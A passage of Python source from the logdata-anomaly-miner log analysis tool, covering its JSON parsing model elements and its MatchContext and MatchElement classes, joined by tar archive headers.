return None except JSONDecodeError as e: logging.getLogger(DEBUG_LOG_NAME).debug(e) return None self.dec_escapes = True if self.is_ascii(match_context.match_data.decode()): match_context.match_data = match_context.match_data.decode("unicode-escape").encode() self.dec_escapes = False matches += self.parse_json_dict(self.key_parser_dict, json_match_data, current_path, match_context) remove_chars = [b' ', b'}', b']', b'"', b'\r', b'\n'] match_data = match_context.match_data for c in remove_chars: match_data = match_data.replace(c, b"") if None in matches or (match_data != b"" and len(matches) > 0): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "get_match_element_main NONE RETURNED\n" + match_context.match_data.strip(b' }]"\r\n').decode()) match_context.match_data = old_match_data return None # remove all remaining spaces and brackets. match_context.update(match_context.match_data) if len(matches) == 0: resulting_matches = None else: resulting_matches = matches return MatchElement(current_path, str(json_match_data).encode(), json_match_data, resulting_matches) # type: ignore[arg-type] def parse_json_dict(self, json_dict: dict, json_match_data: dict, current_path: str, match_context): """Parse a json dictionary.""" matches: List[Union[MatchElement, None]] = [] if not self.check_keys(json_dict, json_match_data, match_context): return [None] for i, key in enumerate(json_match_data.keys()): split_key = key key = self.get_full_key(key, json_dict) if key not in json_dict: index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 2" + key + str(json_dict)) if "ALLOW_ALL_KEYS" in json_dict.keys(): key = "ALLOW_ALL_KEYS" elif self.allow_all_fields: index = match_context.match_data.find(key.encode()) + len(key.encode()) index += len(match_context.match_data) - len(match_context.match_data[index:].lstrip(b' \n\t:"')) + \ 
len(str(json_match_data[key])) match_context.update(match_context.match_data[:index]) if match_context.match_data.replace(b"}", b"").replace(b"]", b"").replace(b'"', b"") == b"": match_context.update(match_context.match_data) continue else: return [None] value = json_dict[key] if isinstance(value, (dict, list)) and (not isinstance(json_match_data, dict) or split_key not in json_match_data): logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 3, Key: " + split_key + ", Value: " + repr(value)) return [None] if isinstance(value, dict): if json_match_data[split_key] is None and (json_dict[key] == "NULL_OBJECT" or self.is_nullable_key(key)): data = b"null" matches.append(MatchElement(f"{current_path}/{key}", data, data, None)) index = match_context.match_data.find(data) if match_context.match_data[index + 4] == 34: # " index += 1 match_context.update(match_context.match_data[:index + len(data)]) return matches matches += self.parse_json_dict(value, json_match_data[split_key], f"{current_path}/{split_key}", match_context) if json_match_data[split_key] == {}: index = match_context.match_data.find(split_key.encode()) index = match_context.match_data.find(b"}", index) data = match_context.match_data[:index] match_element = MatchElement(current_path+"/"+key, data, data, None) matches.append(match_element) match_context.update(match_context.match_data[:index]) if (len(matches) == 0 and not key.startswith(self.optional_key_prefix)) or (len(matches) > 0 and matches[-1] is None): logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches elif isinstance(value, list): res = self.parse_json_array(json_dict, json_match_data, key, split_key, current_path, matches, match_context, i) if res is not None: return res elif value == "EMPTY_OBJECT": if isinstance(json_match_data[split_key], dict) and len(json_match_data[split_key].keys()) == 0: index = match_context.match_data.find(b"}") + 1 data = 
match_context.match_data[:index] match_element = MatchElement(current_path+"/"+key, data, data, None) matches.append(match_element) match_context.update(data) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_OBJECT " + split_key + " is not empty. Keys: " + str(json_match_data[split_key].keys())) matches.append(None) elif json_dict[key] == "EMPTY_ARRAY": if isinstance(json_match_data[split_key], list) and len(json_match_data[split_key]) == 0: index = match_context.match_data.find(b"]") + 1 data = match_context.match_data[:index] match_element = MatchElement(current_path+"/"+key, data, data, None) matches.append(match_element) match_context.update(data) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_ARRAY " + split_key + " is not empty. Data: " + str(json_match_data[split_key])) matches.append(None) else: if key != split_key and split_key not in json_match_data: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + f"Optional Key {key} not found in json_match_data") continue if split_key not in json_match_data: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Key {split_key} not found in json_match_data. RETURN [NONE] 4") return [None] match_element, index, data = self.parse_json_object(json_dict, json_match_data, key, split_key, current_path, match_context) matches.append(match_element) if index == -1 and match_element is None: backslash = b"\\" logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Necessary element did not match! 
Key: {key}, MatchElement: {match_element}, Data: " f"{data.decode()}, IsFloat {isinstance(json_match_data[split_key], float)}, Index: {index}, " f"MatchContext: {match_context.match_data.replace(backslash, b'').decode()}") return matches match_context.update(match_context.match_data[:index + len(data)]) missing_keys = [x for x in json_dict if self.get_stripped_key(x) not in json_match_data and x != "ALLOW_ALL_KEYS" and not (x.startswith(self.optional_key_prefix) or x.startswith(self.nullable_key_prefix + self.optional_key_prefix))] for key in missing_keys: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "Missing Key: " + key) return [None] return matches def check_keys(self, json_dict, json_match_data, match_context): """Check if no keys are missing and if the value types match.""" if "ALLOW_ALL_KEYS" in json_dict.keys(): return True if json_match_data is None: return False missing_keys = [x for x in json_dict if self.get_stripped_key(x) not in json_match_data and not (x.startswith( self.optional_key_prefix) or x.startswith(self.nullable_key_prefix + self.optional_key_prefix))] for key in missing_keys: if (not key.startswith(self.nullable_key_prefix) or ( key.startswith(self.nullable_key_prefix) and key[len(self.nullable_key_prefix):] not in json_match_data)): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 1. Key: " + key) return False for key in json_dict.keys(): k = self.get_stripped_key(key) if not isinstance(json_match_data, dict) or (k in json_match_data and isinstance(json_match_data[k], list) and not isinstance( json_dict[key], list) and json_dict[key] != "EMPTY_ARRAY"): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 5. 
Key: " + key) return False return True def flatten_list(self, lst: list): """Flatten a list of lists using this method recursively.""" if not isinstance(lst, list): return None res: List[Any] = [] for val in lst: if isinstance(val, list): res += self.flatten_list(val) else: res.append(val) return res def parse_json_array(self, json_dict: dict, json_match_data: dict, key: str, split_key: str, current_path: str, matches: list, match_context, i: int): """Parse an array in a json object.""" if json_match_data[split_key] is None and self.is_nullable_key(key): return None if not isinstance(json_match_data[split_key], list): if json_match_data[split_key] is None and key.startswith(self.optional_key_prefix): data = b"null" index = match_context.match_data.find(split_key.encode() + b'":') + len(split_key.encode() + b'":') index += match_context.match_data[index:].find(b"null") + len(b"null") match_context.update(match_context.match_data[:index]) matches.append(MatchElement(f"{current_path}/{key}", data, data, None)) return matches logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "Key " + split_key + " is no array. 
Data: " + str(json_match_data[split_key])) return [None] search_string = b"]" match_array = self.flatten_list(json_match_data[split_key]) value = self.flatten_list(json_dict[key]) for j, data in enumerate(match_array): for k, val in enumerate(value): if isinstance(data, str): enc = "utf-8" if self.dec_escapes and self.is_ascii(data): enc = "unicode-escape" data = data.encode(enc) if data is None: data = b"null" elif not isinstance(data, bytes): data = str(data).encode() if isinstance(val, dict): matches += self.parse_json_dict(val, match_array[j], f"{current_path}/{split_key}", match_context) if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches del matches[-1] continue break else: if val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "ALLOW_ALL (ARRAY)") match_element = MatchElement(current_path+"/"+key, data, data, None) elif json_dict[key] == "EMPTY_ARRAY": if isinstance(data, list) and len(data) == 0: index = match_context.match_data.find(search_string) data = match_context.match_data[:index] match_element = MatchElement(current_path+"/"+key, data, data, None) match_context.update(data) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_ARRAY " + split_key + " is not empty. Data: " + json_match_data[split_key]) return None else: match_element = val.get_match_element(current_path, MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "MatchElement NONE 1. match_string: " + match_element.match_string.decode() + ", data: " + data.decode()) match_element = None if match_element is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "MatchElement NONE 2. 
Data: " + data.decode()) index = -1 else: index = match_context.match_data.find(data) match_context.update(match_context.match_data[:index + len(data)]) if index == -1 and val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "ALLOW_ALL (ARRAY-ELEMENT). Data: " + match_context.match_data.decode()) index = match_context.match_data.find(search_string) match_context.update(match_context.match_data[:index]) if match_element is not None or (match_element is None and not key.startswith(self.optional_key_prefix)): matches.append(match_element) if index == -1: if len(value) - 1 == k: return matches del matches[-1] continue if len(matches) == 0: return [None] if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN MATCHES 3") return matches del matches[-1] continue if len(json_match_data.keys()) > i + 1: match_context.update(match_context.match_data[:match_context.match_data.find(list(json_match_data.keys())[i + 1].encode())]) else: match_context.update(match_context.match_data[:match_context.match_data.find(search_string) + len(search_string)]) return None def parse_json_object(self, json_dict, json_match_data, key, split_key, current_path, match_context): """Parse a literal from the json object.""" current_path += "/" + key data = json_match_data[split_key] enc = "utf-8" if isinstance(data, str): if self.dec_escapes and self.is_ascii(data): enc = "unicode-escape" data = data.encode(enc) elif isinstance(data, bool): data = str(data).replace("T", "t").replace("F", "f").encode() elif data is None: data = b"null" if self.is_nullable_key(key) or json_dict[key] == "NULL_OBJECT": start = 0 if "null" in key: start = match_context.match_data.find(data) + 4 index = match_context.match_data.find(data, start) if match_context.match_data[index + 4] == 34: index += 1 return MatchElement(current_path, data, data, None), index, data return None, -1, data elif not isinstance(data, bytes): data = 
str(data).encode() if json_dict[key] == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "ALLOW_ALL (DICT)\n" + data.decode()) match_element = MatchElement(current_path, data, data, None) last_bracket = match_context.match_data.find(b"}", len(data)) while match_context.match_data.count(b"{", 0, last_bracket) - match_context.match_data.count(b"}", 0, last_bracket) > 0: last_bracket = match_context.match_data.find(b"}", last_bracket) + 1 index = last_bracket - len(data) elif json_dict[key] == "EMPTY_STRING": if data == b"": match_element = MatchElement(current_path, data, data, None) index = match_context.match_data.find(split_key.encode()) + len(split_key) index += match_context.match_data[index:].find(b'""') + len(b'""') else: match_element = None index = -1 else: match_element = json_dict[key].get_match_element(current_path, MatchContext(data)) data_len = len(data) if match_element is not None and len(match_element.match_string) != data_len and ( not isinstance(match_element.match_object, bytes) or len(match_element.match_object) != data_len): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Data length not matching! 
match_string: {len(match_element.match_string)}, data: {data_len}," f" data: {data.decode()}") match_element = None index = max([match_context.match_data.replace(b"\\", b"").find(split_key.encode()), match_context.match_data.find(split_key.encode()), match_context.match_data.decode().find(split_key)]) index += match_context.match_data[index:].find(split_key.encode() + b'":') + len(split_key.encode() + b'":') try: index += max([match_context.match_data.decode(enc)[index:].find(data.decode(enc)), match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data)]) except UnicodeDecodeError: index += max([match_context.match_data.decode()[index:].find(data.decode()), match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data)]) index += len(match_context.match_data[index:]) - len(match_context.match_data[index:].lstrip(b" \r\t\n")) if match_context.match_data[index:].find(b'"') == 0: index += len(b'"') # for example float scientific representation is converted to normal float.. if index == -1 and match_element is not None and isinstance(json_match_data[split_key], float): indices = [match_context.match_data.find(b",", len(match_element.match_string) // 3), match_context.match_data.find(b"]"), match_context.match_data.find(b"}")] indices = [x for x in indices if x >= 0] index = min(indices) if match_element is None: index = -1 return match_element, index, data JsonStringModelElement.py000066400000000000000000000222311500476301700355340ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element for parsing json strings. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
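This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging
import orjson
from collections import deque
from typing import Any

from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class JsonAccessObject:
    """Flatten a nested dictionary into path-like keys.

    A dictionary such as ``{"key": {"another_key": {"somelist": [{"foo": "bar"}]}}}`` is flattened to the
    key ``key.another_key.somelist[0].foo`` with the value ``bar``. Every leaf is recorded in ``self.collection`` as
    ``collection[flattened_key] = {"levels": deque, "value": leaf}``, where ``levels`` holds the dictionary keys and
    ``[index]`` list markers that lead to the leaf (list leaves carry their own ``[index]`` as last level).
    Dictionary keys that contain the delimiter or start with ``[`` make the flattened key ambiguous; the ``levels``
    deque stays unambiguous and should be preferred for lookups.
    """

    def __init__(self, d: dict):
        """Flatten ``d`` immediately; the result is available in ``self.collection``."""
        self.debug: bool = False
        # Stack of the keys / list markers on the path to the element currently being visited.
        self.levels: deque = deque()
        self.delimiter: str = '.'
        self.collection: dict = {}
        self.flatten(d)

    def join_levels(self) -> str:
        """Join the current level stack to one flattened key; ``[n]`` markers are appended without a delimiter."""
        ret = ""
        for level in self.levels:
            if not level.startswith("[") and ret:
                ret += self.delimiter
            ret += level
        return ret

    def create_collection_entry(self, index: str, levels: deque, value):
        """Store ``value`` under the flattened key ``index`` together with a copy of its level stack."""
        self.collection[index] = {'levels': levels.copy(), 'value': value}

    def flatten(self, d: Any, islist: int = -1):
        """Recursively flatten ``d`` into ``self.collection``.

        @param d a dictionary, or a list when ``islist`` is not -1.
        @param islist -1 while a dictionary is flattened; otherwise the index of the next list element.
        """
        if islist > -1:
            for element in d:
                if isinstance(element, (dict, list)):
                    # Containers inside a list get their index as a level, so nested values flatten to key[i].sub
                    # or key[i][j]. The original passed the builtin ``list`` type as islist for a nested list, which
                    # raised a TypeError as soon as any list contained another list.
                    self.levels.append(f"[{islist}]")
                    self.flatten(element, 0 if isinstance(element, list) else -1)
                    self.levels.pop()
                else:
                    if self.debug:
                        print(f"{ self.join_levels() }[{ islist }]: { element }")
                    # Record the index as the last level so that the element can later be resolved individually.
                    leaf_levels = self.levels.copy()
                    leaf_levels.append(f"[{islist}]")
                    self.create_collection_entry("%s[%d]" % (self.join_levels(), islist), leaf_levels, element)
                islist = islist + 1
        else:
            for (k, v) in d.items():
                self.levels.append(k)
                if isinstance(v, dict):
                    self.flatten(v)
                elif isinstance(v, list):
                    self.flatten(v, 0)
                else:
                    if self.debug:
                        print(f"{ self.join_levels() } : { v }")
                    self.create_collection_entry(self.join_levels(), self.levels, v)
                self.levels.pop()


class JsonStringModelElement(ModelElementInterface):
    """Parse a JSON document and match its values against the parsers of a key_parser_dict.

    The key_parser_dict is flattened with JsonAccessObject; for every flattened key the value found at the same
    position in the log data is converted to bytes and handed to the configured child parser. In strict mode the
    log data must contain exactly the configured keys; otherwise additional keys in the log data are ignored.
    A configured key that is missing in the log data never matches. JSON null values are skipped when ignore_null
    is set, otherwise the child parser receives an empty byte string.
    """

    def __init__(self, element_id: str, key_parser_dict: dict, strict_mode: bool = False, ignore_null: bool = True):
        """Create the element.

        @param element_id identifier shown in the match path; must be a non-empty string.
        @param key_parser_dict (nested) dictionary mapping JSON keys to child ModelElementInterface parsers.
        @param strict_mode when True, the log data must not contain keys that are absent from key_parser_dict.
        @param ignore_null when True, JSON null values are skipped instead of being parsed as an empty string.
        @raises TypeError, ValueError for invalid arguments (the base class additionally validates self.children).
        """
        self.children: list = []
        self.strict_mode = strict_mode
        self.ignore_null = ignore_null
        if not isinstance(key_parser_dict, dict):
            msg = "key_parser_dict has to be of the type dict."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.jao = JsonAccessObject(key_parser_dict)
        if not isinstance(element_id, str):
            msg = "element_id has to be of the type string."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(element_id) < 1:
            msg = "element_id must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.element_id = element_id
        # self.children is filled before the base constructor runs, which checks that it is a non-empty list
        # of ModelElementInterface instances.
        self.fill_children()
        super().__init__(element_id, key_parser_dict=key_parser_dict, strict_mode=strict_mode, ignore_null=ignore_null)

    def fill_children(self):
        """Collect the leaf parsers of the flattened key_parser_dict into self.children."""
        for entry in self.jao.collection.values():
            self.children.append(entry['value'])

    def get_id(self):
        """Get the element ID."""
        return self.element_id

    def get_child_elements(self):
        """Get all child model elements, i.e. the parsers configured in key_parser_dict."""
        return self.children

    @staticmethod
    def _resolve_levels(jdict, levels):
        """Walk ``levels`` (dictionary keys and ``[n]`` list markers) down from ``jdict``.

        @return (True, value) when every level exists, (False, None) otherwise. A type mismatch between the configured
        path and the log data (e.g. a string where an object is expected) counts as "not found" instead of raising,
        so malformed input cannot crash the parser.
        """
        current = jdict
        for level in levels:
            if isinstance(current, dict):
                if level not in current:
                    return False, None
                current = current[level]
            elif isinstance(current, list) and level.startswith("[") and level.endswith("]"):
                try:
                    index = int(level[1:-1])
                except ValueError:
                    return False, None
                if not 0 <= index < len(current):
                    return False, None
                current = current[index]
            else:
                return False, None
        return True, current

    def _match_value(self, key: str, value, child, current_path: str):
        """Feed one JSON value to its child parser.

        @return the child's MatchElement, or None when the child did not match.
        """
        if value is None:
            # null reaches the child as an empty byte string (callers skip it when ignore_null is set).
            parse_line = b""
        else:
            # Non-string values are converted with str(); note that this yields Python spellings such as "True"
            # or "{'a': 1}" rather than JSON text.
            parse_line = str(value).encode('utf-8')
        child_match = child.get_match_element(current_path, MatchContext(parse_line))
        if child_match is None:
            logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement-subparser-error: %s -> %s", key, value)
        return child_match

    def _match_strict(self, jdict: dict, current_path: str):
        """Match in strict mode: the flattened log data must hold exactly the configured keys.

        @return the list of child matches (possibly empty when nulls were skipped), or None on any mismatch.
        """
        jdictjao = JsonAccessObject(jdict)
        if len(jdictjao.collection) != len(self.jao.collection):
            msg = "JsonStringModelElement-subparser-error: "
            msg += "strict mode enabled and fields detected that do not exist in parser-config"
            logging.getLogger(DEBUG_LOG_NAME).debug(msg)
            return None
        matches = []
        for key, entry in self.jao.collection.items():
            if key not in jdictjao.collection:
                msg = "JsonStringModelElement-subparser-error: field \"%s\" not found but strict-enabled"
                logging.getLogger(DEBUG_LOG_NAME).debug(msg, key)
                return None
            value = jdictjao.collection[key]['value']
            if value is None and self.ignore_null:
                logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: ignore null at %s", key)
                continue
            child_match = self._match_value(key, value, entry['value'], current_path)
            if child_match is None:
                return None
            matches.append(child_match)
        return matches

    def _match_lenient(self, jdict: dict, current_path: str):
        """Match in non-strict mode: extra keys in the log data are ignored, configured keys must exist.

        @return the list of child matches (possibly empty when nulls were skipped), or None on any mismatch.
        """
        matches = []
        for key, entry in self.jao.collection.items():
            found, value = self._resolve_levels(jdict, entry['levels'])
            if not found:
                # The original logged this and then parsed the partially traversed parent value; a missing or
                # type-mismatched key is now a definite mismatch.
                logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement-subparser: %s not found", key)
                return None
            if value is None and self.ignore_null:
                logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: ignore null at %s", key)
                continue
            child_match = self._match_value(key, value, entry['value'], current_path)
            if child_match is None:
                return None
            matches.append(child_match)
        return matches

    def get_match_element(self, path: str, match_context):
        """Parse the whole remaining match data as a JSON object and run the configured child parsers on it.

        @param path the model path of the parent element.
        @param match_context a MatchContext whose match_data holds the JSON document as bytes; the complete
        document is consumed on success.
        @return a MatchElement whose children are the child matches (None when every configured value was a
        skipped null), or None when the data is not a JSON object, a configured key is missing, strict mode finds
        additional fields, or a child parser does not match.
        """
        # NOTE(review): the blank after "/" is kept unchanged because detector configurations reference this path
        # string; it looks like a typo - confirm with the maintainers before changing it.
        current_path = f"{ path }/ { self.element_id }"
        match_data = match_context.match_data
        if not match_data:
            return None
        # The data is untrusted log input: decode with replacement so that logging can never raise UnicodeDecodeError.
        logging.getLogger(DEBUG_LOG_NAME).info("JsonStringModelElement %s/%s", path, match_data.decode('utf-8', errors='replace'))
        try:
            jdict = orjson.loads(match_data)
            if not isinstance(jdict, dict):
                # Scalars and arrays at the top level have no keys to match (the original raised AttributeError/TypeError).
                logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: top-level JSON value is not an object")
                return None
            if self.strict_mode:
                matches = self._match_strict(jdict, current_path)
            else:
                matches = self._match_lenient(jdict, current_path)
        except orjson.JSONDecodeError as exception:
            msg = f"JsonStringModelElement { exception }: { match_data.decode('utf-8', errors='replace') }"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            return None
        except RecursionError:
            # JsonAccessObject.flatten recurses once per nesting level, so pathologically nested input could
            # exhaust the interpreter stack; treat it as no match instead of propagating.
            logging.getLogger(DEBUG_LOG_NAME).error("JsonStringModelElement: JSON nesting too deep")
            return None
        if matches is None:
            return None
        match_context.update(match_data)
        # MatchElement rejects an empty children list, so an all-null document yields a childless match.
        return MatchElement(current_path, match_data, match_data, matches if matches else None)
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/MatchContext.py000066400000000000000000000112711500476301700336230ustar00rootroot00000000000000
"""This module defines the match context.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.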
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging
from typing import Union

from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer import AminerConfig


class MatchContext:
    """Hold the state of one matching run, i.e. the data that still has to be matched.

    When searching for non-atomic matches (e.g. sequences), sub-elements may advance the context even though
    the enclosing model element fails as a whole; such elements are responsible for restoring the context
    before they return.
    """

    def __init__(self, match_data: bytes):
        """Create the context over the full, still unmatched data.

        @param match_data the bytes the next model element will be tested against.
        @raises TypeError when match_data is not a bytes object.
        """
        if isinstance(match_data, bytes):
            self.match_data = match_data
            return
        msg = "match_data has to be of the type bytes."
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise TypeError(msg)

    def update(self, match_string: bytes):
        """Drop len(match_string) bytes from the front of the unmatched data.

        For performance reasons this does not verify that match_string really is the prefix of match_data;
        DebugMatchContext.update performs that check.
        """
        consumed = len(match_string)
        self.match_data = self.match_data[consumed:]


class DebugMatchContext(MatchContext):
    """Slower MatchContext variant that records a trace of every update for debugging."""

    def __init__(self, match_data: bytes):
        """Create the debug context; the type check of match_data is done by the base class."""
        self.debug_info = ""
        self.last_match_data: Union[None, bytes] = None
        self.shortest_unmatched_data = match_data
        super().__init__(match_data)

    @staticmethod
    def _printable(*chunks):
        """Decode all chunks with the configured encoding; fall back to repr() for all of them if any fails."""
        try:
            return tuple(chunk.decode(AminerConfig.ENCODING) for chunk in chunks)
        except UnicodeError:
            return tuple(repr(chunk) for chunk in chunks)

    def update(self, match_string: bytes):
        """Consume match_string from the front of the data and append trace lines to debug_info.

        @raises TypeError when match_string is not bytes.
        @raises ValueError ("Illegal state") when match_data does not start with match_string.
        """
        if not isinstance(match_string, bytes):
            msg = "match_string has to be of the type bytes."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if not match_string:
            return
        data_text, string_text = self._printable(self.match_data, match_string)
        if self.match_data != self.last_match_data:
            self.last_match_data = self.match_data
            if self.debug_info:
                self.debug_info += " "
            self.debug_info += f'Starting match update on "{data_text}"\n'
        if not self.match_data.startswith(match_string):
            self.debug_info += f' Current data {data_text} does not start with "{string_text}"\n'
            msg = "Illegal state"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.match_data = self.match_data[len(match_string):]
        self.last_match_data = self.match_data
        shortest = self.shortest_unmatched_data
        if shortest is None or len(self.match_data) < len(shortest):
            self.shortest_unmatched_data = self.match_data
        self.debug_info += f' Removed: "{string_text}", remaining {len(self.match_data)} bytes\n'

    def get_debug_info(self):
        """Return the accumulated trace plus the shortest unmatched data seen so far, and reset the trace."""
        while "\n\n" in self.debug_info:
            self.debug_info = self.debug_info.replace("\n\n", "\n")
        result, self.debug_info = self.debug_info, ""
        data, = self._printable(self.shortest_unmatched_data)
        return result + f' Shortest unmatched data: "{data}"\n'

    def get_shortest_unmatched_data(self):
        """Get the shortest match_data seen while updating; this shows where parsing got stuck."""
        return self.shortest_unmatched_data
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/MatchElement.py000066400000000000000000000144031500476301700335700ustar00rootroot00000000000000
"""This module provides only the MatchElement class to store results from parser element matching process.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging
from typing import Any, List, Union

from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer import AminerConfig


class MatchElement:
    """Store and handle the data of one match produced by a model element."""

    def __init__(self, path: Union[str, None], match_string: bytes, match_object: Any, children: Union[List["MatchElement"], None]):
        """Initialize the MatchElement.

        @param path when None, this element is anonymous: it cannot be added to the result data and may not have children.
        @param match_string the part of the input byte string covered by this match.
        @param match_object the match_string converted to an object by matchers that detect more complex data types,
        e.g. integer numbers or IP addresses.
        @param children list of MatchElements which matched in the process.
""" if not isinstance(path, str) and path is not None: msg = "path has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if (not path) and children: msg = "Anonymous match may not have children" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.path = path if not isinstance(match_string, bytes): msg = "match_string has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.match_string = match_string self.match_object = match_object if not isinstance(children, list) and children is not None: msg = "children has to be of the type list or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(children, list): if len(children) < 1: msg = "children must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for child in children: if not isinstance(child, MatchElement): msg = "children have to be of the type MatchElement." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.children = children def get_path(self): """Get the path of this element.""" return self.path def get_match_string(self): """Get the log_atom string part this match element is matching.""" return self.match_string def get_match_object(self): """Get the matched data converted to an object of suitable type.""" return self.match_object def get_children(self): """Get the submatch children of this match, if any.""" return self.children def annotate_match(self, indent_str: Union[str, None]): """Annotate a given match element showing the match path elements and the parsed values. @param indent_str if None, all elements are separated just with a single space, no matter how deep the nesting level of those elements is. If not None, all elements are put into an own line, that is prefixed by the given indent_str and indenting is increased by two spaces for each level. 
""" next_indent = None if not isinstance(indent_str, str) and indent_str is not None: msg = "indent_str has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) try: if isinstance(self.match_object, bytes): data = self.match_object.decode(AminerConfig.ENCODING) else: data = repr(self.match_object) except UnicodeError: data = repr(self.match_object) if indent_str is None: result = f"{self.path}: {data}" else: result = f"{indent_str}{self.path}: {data}" next_indent = indent_str + " " if self.children is not None: for child_match in self.children: if next_indent is None: result += " " + child_match.annotate_match(None) else: result += "\n" + child_match.annotate_match(next_indent) return result def serialize_object(self): """Create a serialization of this match element and all the children. With sane and unique path elements, the serialized object will also be unique. """ children = [] if self.children: for child_match in self.children: children.append(child_match.serialize_object()) return {"path": self.path, "match_object": self.match_object, "match_string": self.match_string, "children": children} def __str__(self): """Get a string representation of this match element excluding the children.""" num_children = 0 if self.children is not None: num_children = len(self.children) try: match_string = self.match_string.decode(AminerConfig.ENCODING) if isinstance(self.match_object, bytes): match_object = self.match_object.decode(AminerConfig.ENCODING) else: match_object = repr(self.match_object) except UnicodeError: match_string = repr(self.match_string) match_object = repr(self.match_object) return f"MatchElement: path = {self.path}, string = {match_string}, object = {match_object}, children = {num_children}" ModelElementInterface.py000066400000000000000000000670601500476301700353450ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines various 
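interfaces for log atom parsing and namespace shortcuts to the ModelElements.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import abc
import locale
import logging
import re

from aminer.AminerConfig import DEBUG_LOG_NAME

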